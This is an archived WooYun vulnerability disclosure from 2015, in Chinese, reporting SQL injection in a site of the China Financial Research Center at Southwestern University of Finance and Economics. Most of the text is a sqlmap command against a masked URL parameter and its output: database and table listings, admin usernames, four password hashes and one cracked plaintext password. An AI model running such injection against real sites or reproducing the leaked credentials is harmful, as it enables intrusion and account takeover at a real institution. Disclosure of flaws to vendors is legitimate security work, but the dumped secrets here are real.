乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-23: 细节已通知厂商并且等待厂商处理中 2015-10-28: 厂商已经主动忽略漏洞,细节向公众公开
西南财经大学中国金融研究中心SQL注射
sqlmap.py -u "http://**.**.**.**/index.php?m=content&c=diy&a=member_lists_ajax&typeid=1&groupid=" --dbs
available databases [7]:[*] caida[*] crm[*] discuzx_zgjr[*] edp[*] information_schema[*] mysql[*] ultraxDatabase: caida[37 tables]+------------------------+| shuwon_admin_user || shuwon_ads || shuwon_ads_attachment || shuwon_album || shuwon_albums || shuwon_article_gallery || shuwon_baseconfig || shuwon_brand || shuwon_category || shuwon_download || shuwon_feedback || shuwon_form || shuwon_goods || shuwon_goods_gallery || shuwon_honor || shuwon_hr || shuwon_hr_reply || shuwon_imglib || shuwon_keywords || shuwon_links || shuwon_member || shuwon_member_group || shuwon_message || shuwon_model || shuwon_modules || shuwon_navs || shuwon_news || shuwon_news_gallery || shuwon_photos || shuwon_pm || shuwon_pm_data || shuwon_product_gallery || shuwon_snews || shuwon_special || shuwon_special_c_data || shuwon_special_content || shuwon_type |+------------------------+Database: caidaTable: shuwon_admin_user[18 columns]+--------------+----------------------+| Column | Type |+--------------+----------------------+| add_time | int(10) unsigned || admin_tel | varchar(11) || class_power | longtext || email | varchar(255) || face | varchar(255) || feel | varchar(255) || id | smallint(5) unsigned || integral | varchar(45) || login_time | int(10) || module_power | longtext || parent_id | varchar(255) || passwd | varchar(32) || qq | int(15) unsigned || realname | varchar(45) || role | smallint(5) unsigned || type | tinyint(1) || user_ip | varchar(15) || username | varchar(60) |+--------------+----------------------+Database: caidaTable: shuwon_admin_user[4 entries]+-------------+| username |+-------------+| admin || icfs_admin || icfs_editer || shuwon |+-------------+2e16c74914f17ef5290da974b34f55bb451e294d97eea021c59c88d95cebd878b99338e6e195d13f14c03a3fab92f580ce6d469b4d7fe767f3807278c12c9137明文Q!W@E#R$T%
就最后一个密码解密出来了。。。这么恶心
综上
你们懂
危害等级:无影响厂商忽略
忽略时间:2015-10-28 10:08
暂无